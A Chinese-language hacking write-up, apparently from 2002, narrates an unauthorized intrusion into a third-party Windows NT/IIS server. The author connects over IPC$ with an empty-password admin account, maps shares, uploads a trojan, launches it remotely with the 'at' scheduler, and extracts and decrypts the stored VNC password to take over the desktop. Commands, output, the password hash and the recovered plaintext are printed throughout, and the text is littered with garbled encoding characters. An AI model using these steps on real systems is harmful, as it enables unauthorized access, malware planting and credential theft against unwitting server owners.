(作者:xhacker)
今天晚上在網上準備找一些可看性強的技術文章用已提高水平�����,但有幾個不錯的網絡安全網站又不知什么原因關閉了。找不到什么好文章�,這樣我就自己找一臺服務器練習一下,因為這樣也能學到不少技術�����。于是我翻了翻以前保存下來的掃描結果,看到有一臺服務器賬號較多,共有400多個���,其中有個stone賬號的密碼為空(admin權限)�����??磥砭W管沒有開置密碼策略����,好,就選這臺服務器下手�。先ping一下,看看這臺服務器是否存在(服務器IP地址以x.x.x.x替代表示):
E:\>ping x.x.x.x
Pinging x.x.x.x with 32 bytes of data:
Reply from x.x.x.x: bytes=32 time=381ms TTL=110
Reply from x.x.x.x: bytes=32 time=320ms TTL=110
Reply from x.x.x.x: bytes=32 time=321ms TTL=110
Reply from x.x.x.x: bytes=32 time=320ms TTL=110
Ping statistics for x.x.x.x:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 320ms, Maximum = 381ms, Average = 335ms
好了���,以下就不多說了����,ipc$入侵教程多的是,大家一看就明白���。
過程如下:
E:\>net use \\x.x.x.x\ipc$ "" /user:stone
命令成功完成����。
E:\>dir \\x.x.x.x\c$
找不到網絡名�����。
E:\>dir \\x.x.x.x\admin$
找不到網絡名�����。
E:\>dir \\x.x.x.x\d$
找不到網絡名����。
E:\>dir \\x.x.x.x\E$
找不到網絡名。
…………
倒�!運氣不好啊,網管這方面倒還有點安全意識��,把winnt的所有默認共享全去掉了,其實這點反而激發(fā)了我的興趣啊。現(xiàn)在的情況是獲得了一個admin的賬號���,但是卻沒有一個默認的可寫目錄和根目錄�����,所以不能用常規(guī)的方式進一步獲取資源了��。呵呵��,希望還是有的��!接下來我自己尋找可寫目錄,查查看網管自己有沒有設置共享資源吧���。如下:
E:\>net view \\x.x.x.x
在 \\x.x.x.x 的共享資源
資源共享名 類型 用途 注釋
------------------------------------------------------------------
ADHot Disk
APPL Disk
DATABASE Disk
demo_1 Print \\Demo\demo_1
HPLJ5si Print HP LaserJet 5Si
HPlp1 Print HP LaserJet 5Si (Linux Shared)
IED Disk
InetPub Disk
internal Disk
NETLOGON Disk 登入伺服器資源分享
SALES Disk
sharing Disk
temp Disk
visio Disk
工程DownLoad資料庫
Disk
業(yè)務DownLoad資料庫
Disk
雅邁y2k Disk
命令成功完成����。
太棒了����,有這么多共享目錄,看來這是一臺工作服務器����,是為了內部網里的工作需要設定了相應的共享資源����。我們接下來映射共享硬盤吧���,從Inetpub開始吧����,這是winnt/2k默認的存放主頁的地方�����,它都共享真是最好不過了��,許多漏洞都和它有關�����。我的利用過程如下:
E:\>net use g: \\x.x.x.x\Inetpub
命令成功完成���。
OK!現(xiàn)在為了方便�����,把當前的本地硬盤切換到虛擬映射的硬盤吧�。
隨便再看看這個共享目錄有沒有對stone賬號開放寫入權限。隨便創(chuàng)建一個目錄����,我創(chuàng)建個xhacker目錄�����,如下:
D:\>g:
G:\>md xhacker
G:\>dir
驅動器 G 中的卷沒有標簽�。
卷的序列號是 6803-C297
G:\ 的目錄
2002-06-14 21:37 <DIR> .
2002-06-14 21:37 <DIR> ..
2002-06-06 18:04 <DIR> ASPSamp
2000-04-14 04:28 2,940 c.txt
2002-06-14 17:59 <DIR> Catalog.wci
2002-06-14 20:37 <DIR> ftproot
1998-11-11 11:27 <DIR> gophroot
2001-11-26 10:07 <DIR> iissamples
2000-01-04 14:22 <DIR> mail
2000-01-04 14:26 <DIR> Mailroot
2002-06-14 11:14 <DIR> scripts
2000-04-14 04:27 26 Test.bat
2001-02-02 13:29 <DIR> wwwroot
2002-06-14 21:37 <DIR> xhacker (就是這個,我才創(chuàng)建的)
2 個文件 2,966 字節(jié)
12 個目錄 706,426,880 可用字節(jié)
看到了嗎����?呵呵,這下可好了��。有希望拿admin���。再看看scripts里內容再說吧�。過程如下:
G:\>dir scripts
驅動器 G 中的卷沒有標簽�。
卷的序列號是 6803-C297
G:\scripts 的目錄
2002-06-14 11:14 <DIR> .
2002-06-14 11:14 <DIR> ..
2002-06-14 11:14 <DIR> iisadmin
0 個文件 0 字節(jié)
3 個目錄 706,426,880 可用字節(jié)
怎么會沒有?沒關系��,再看看wwwroot,這也是經常存放主頁的地方:
G:\>dir wwwroot
驅動器 G 中的卷沒有標簽���。
卷的序列號是 6803-C297
G:\wwwroot 的目錄
2001-02-02 13:29 <DIR> .
2001-02-02 13:29 <DIR> ..
1998-02-24 13:04 4,630 default.asp
1996-11-26 00:00 3,685 default.htm
2002-06-13 21:43 <DIR> demotop
2000-05-25 09:49 23,155 e.htm
2000-01-04 16:40 2,890 Home.htm
1999-12-30 15:28 <DIR> images
2000-06-01 15:32 8,143 index.htm
2001-11-26 10:07 <DIR> Phone Book Service
2001-05-30 00:28 <DIR> recovery
2000-05-25 09:50 6,689 Weekly.htm
1999-12-30 15:28 <DIR> _private
2000-01-04 14:29 <DIR> _vti_log
………(略)
16 個文件 106,073 字節(jié)
8 個目錄 706,426,880 可用字節(jié)
呵呵����,看上去這好像是存放主頁的目錄了。習慣性地放了個idq.dll上去(提升權限)�����,ispc不上���,我還以為這就能拿到了admin呢�����??磥頉]有開放虛擬目錄執(zhí)行權限啊�����。這時想到了瀏覽主頁����,暈倒,404錯誤��,找不到���。不知是不是沒配置好iis���,看來利用admin賬號連接ipc獲取最高控制權的思路已經中斷了(在這里我也虛擬了好幾個共享資源��,嘗試找到可利用資源�����,比如口令文件等�,根本找不到什么重要的)�。本以為一個現(xiàn)成的admin賬號就能拿到它了,現(xiàn)在看沒這么簡單�,我們還是分析一下服務器開了哪些服務再找突破口吧:
x.x.x.x的端口信息:
* + x.x.x.x adsl-61-56-234-146.NHON.sparqnet.net
|___ 21 File Transfer Protocol [Control] (可以嘗試破解并登錄,但不推薦)
|___ 220 demont Microsoft FTP Service (Version 4.0)...
|___ 53 Domain Name Server
|___ 80 World Wide Web HTTP (掃描cgi,iis漏洞����,不過好像iis工作不正常)
|___ HTTP/1.1 404 ............Server: Microsoft-IIS/4.0..Date: Fri, 14 Jun 2002 15:19:05 GMT..Content-Type: text/html..Content-Lengt
|___ 135 DCE endpoint resolution
|___ 139 NETBIOS Session Service
|___ 443 https MCom
|___ 5005 avt-profile-2
|___ 5800 Virtual Network Computing server
|___ 5900 Virtual Network Computing server (VNC服務,考慮這個登錄)
|___ RFB 003.003.
|___ 8000 iRDMI/Shoutcast Server
:
呵呵����,現(xiàn)在我主要可利用入侵的服務有21,80,5900��,由此判斷出這是一臺winnt+iis4.0,而之前我沒有進行掃描端口完全是光想著用現(xiàn)成admin權限的stone賬號進入�。這樣對方即使開了www服務�,我的那個idq.dll也是沒用的,idq.dll只對win2k+sp3以下有效�,所以應該放置一些winnt相關的iis漏洞,比如放一個bat文件放入scripts去拿admin?���?墒沁@臺服務器的www沒有設定好�����,無法通過瀏覽器調用文件。下面再接著分析吧����,大家可能對這個5900端口了解的不多����,我現(xiàn)在就先從5900開始刺探�。這里我簡單給5900(VNC遠程控制軟件所開的端口)介紹幾句�,VNC——Virtual Network Computing(即虛擬網絡計算機系統(tǒng))是由AT&T開發(fā)的各種操作系統(tǒng)之間的相互操作管理系統(tǒng)�,使用VNC可以使你在不同的計算機之間實現(xiàn)真正的相互操作����,不過���,VNC只限于GUI之間的相互操作����,如Windows同Linux系統(tǒng)的X Window之間相互操作���,Windows同Macintosh之間的相互操作等,它可以安裝在Windows中而讓使用者在遠端遙控自己的電腦����,就算是遙控不同的操作平臺也沒有問題.(winnt遠程管理服務軟件主要就是win2k3389,pcanywhere,VNC, Remote Administrator等等)?���,F(xiàn)在有了個思路�����,因為vnc的密碼就在注冊表\HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password 鍵值或者是
\HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3\Password鍵值里���,我們先讀出這個鍵值后再用相應算法解出來就是VNC的遠程管理密碼了。于是我重建了ipc$空連接�����,接著打開regedit注冊表編輯器��,選擇“連接遠程注冊表”,輸入IP地址x.x.x.x����,好了,出現(xiàn)了以下的圖1:
出現(xiàn)了三個鍵值��,然后查找vnc的密碼鍵值,從HKEY_USERS主鍵找好了,非常遺憾��,沒有找到password鍵值�����,看來新版VNC出于安全考慮��,把這個主鍵的密碼去掉了 ,新版的VNC軟件的密碼鍵值存放在HKEY_CURRENT_USER主鍵中��,但即使有個admin賬號在遠程也讀不出這個主鍵�。 這樣通過VNC來入侵的思路又斷了�,真不好辦。接著又想了不少辦法����,其中也不乏有巧妙的,比如在HKEY_CLASSES_ROOT改變某文件關聯(lián)���,指其關聯(lián)指向我預先在inetpub放置的一個捆綁文件默認關聯(lián)程序的木馬��,其實這種方法實際上有可能成功���,但是需要時間去等侍,所以我還是放棄了這種被動的手段�����。
現(xiàn)在我再來做個總結���,目前我遇到的困難是對方把c$,d$,admin$都關了,可我已有了個admin賬號了���,難道真的像其它安全策略文章所說的那樣,只要關掉admin$,c$,d$等等這些系統(tǒng)默認共享���,入侵者即使有個admin賬號也進不來了�����。我向來不輕信這些安全建議的文章����,在反復思考當中���,我突然靈感一現(xiàn)����,又想回到共享資源上著手,試想�����,如果把一個木馬拷貝到一個共享目錄里�,然后遠程再觸發(fā)它運行就好了。關鍵在于怎么觸發(fā)它�����,下套肯定是不聰明的表現(xiàn)�����。我想起了at命令��,這個命令大家都用習慣了遠程啟動admin$或admin$\system32下面的木馬,現(xiàn)在這臺服務器的admin$關了���,所以讓我嘗試一下放在其它path啟動�����,我又看看共享資源列表�,決定放在inetpub\scripts下,因為這個目錄默認是c:\inetpub\scripts之下(沒有裝多系統(tǒng)的情況下)�����。好了����,這個有意思 的入侵策略制定好后����,剩下的就是做木馬、上傳和啟動了�。木馬我是用janker的winshell5.0直接生成的,所以不多說了�,我給木馬起名為server.exe。接下來就是上傳���,
copy d:\server.exe g:\scripts (G:虛擬的是服務器的inetpub���,所以直接輸入scripts)
OK,這個不難看懂。下面再進行最關鍵的一步:
Net time \\x.x.x.x
\\x.x.x.x 的當前時間是 2002/6/25 下午 08:49
命令成功完成。
At \\x.x.x.x.x 20:51 c:\inetpub\scripts\server.exe (這句是不是和以往的用法不太一樣)
新加了一項作業(yè)�,其作業(yè) ID = 1
好了,這樣就使服務器的計劃任務在08:51自動啟動指定的共享目錄下的木馬server.exe,嘿嘿��,現(xiàn)在再逗網友snake玩���,呵呵�����,他是個很好玩的編程牛人,我天天逗他玩�。 時間已經差不多了����,再看看,net time \\x.x.x.x
x.x.x.x 的當前時間是 2002/6/25 下午 09:02
好����,telnet上玩玩,呵呵,果然成功�����!現(xiàn)在終于拿到個高權限的shell了����。不過就是命令行狀態(tài)的���,怎么說軟件也進入窗子時代了,要改改了���。這時我就想到了服務器上運行著的5900,現(xiàn)在取它的遠程控制密碼���,過會用它來遠程控制服務器���。好的��,看我怎么取得它的密碼�����,telnet上剛才的木馬�����,然后運行這么一句導出注冊表中的vnc密碼關鍵值:
regedit /e xhacker.reg HKEY_CURRENT_USER\Software\ORL\WinVNC3
OK,然后type xhacker.reg
[HKEY_CURRENT_USER\Software\ORL\WinVNC3]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"Password"=hex: cd,7c,b9,bd,c7,e9,0c,c9 (關鍵啊�,記下這個)
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
找到了我要的健值了���,接下來回到本地機破解這個鍵值的明文密碼吧(翻了老半天終于找到個程序是破vnc的��,不是窮舉密碼哦),把剛才的8個字段一一輸入�,注意x4的參數W是大寫的。
D:\>x4 -W
cd
7c
b9
bd
c7
e9
0c
c9
Entered HEX String: cd 7c b9 bd c7 e9 c c9
VNC Password: 58218411 (一秒鐘都不要就算出來了�!)
呵呵,密碼是標準的8位純數字58218411��,有什么含義呢�?不猜了。下面就可以登錄他的桌面了���,嘿嘿�����,如下圖2:
圖3:
看到了桌面也沒覺得什么有成就感���,有價值的是又一次開拓了我的思維,也讓我意識到有些習慣性思維的確是一種障礙,比如文中提到的至關重要的一個突破口at命令�����,以前at運行admin$下的程序慣了��,一時想不到它的其它用法,現(xiàn)在還是有其它利用方式的,比如這次就是上傳server.exe木馬至一個可寫目錄里����,然后遠程用at激活運行它。后來我又進行了一些實驗���,發(fā)現(xiàn)在這種情況下即使網管取消所有共享資源我也可以輕松進桌面��,系統(tǒng)只要開個ipc$就可以了,當然這不是說上面的入侵方式沒有價值了����,其實上面的方式通用性較好�����。所以我建議大家要真的想關admin$,c$,d$…還不如只關閉個ipc$��。好了�,這次入侵就記錄到這�����,本人水平有限���,如果大家有興趣與我交流或給我指正�����,請聯(lián)系QQ:66680800
